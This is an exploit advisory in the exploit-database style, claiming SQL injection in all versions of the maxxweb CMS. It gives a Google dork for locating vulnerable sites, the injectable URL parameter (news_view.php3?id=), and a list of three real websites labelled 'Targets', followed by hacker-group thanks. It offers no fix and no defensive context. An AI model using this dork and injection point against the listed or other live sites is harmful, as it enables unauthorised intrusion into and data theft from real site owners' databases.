############################################################################ # Exploit Title: maxxweb Cms Sql Injection # Google Dork: "maxxweb.de Internet-Dienstleistungen" # Discovered By: M4sT3r4N0nY # Software Link: http://maxxweb.de/ # Version: All Version # Category:: webapps # Security Risk:: High # Tested on: GNU/Linux Ubuntu - Windows Server - win7 ############################################################################ # # # Exploit: # # # http://[target]/news_view.php3?id=[Sql] # # # Targets: # # http://www.cacha.de/news_view.php3?id=22 # # http://www.camping-channel.com/news_view.php3?id=9 # # http://www.campingplaetze-griechenland.de/news_view.php3?id=1802 # # ############################################################################ # Special Thanks : Am!r(IrIsT.Ir) & Drosera^cqq47 & Mast3rj0int & NOTER ############################################################################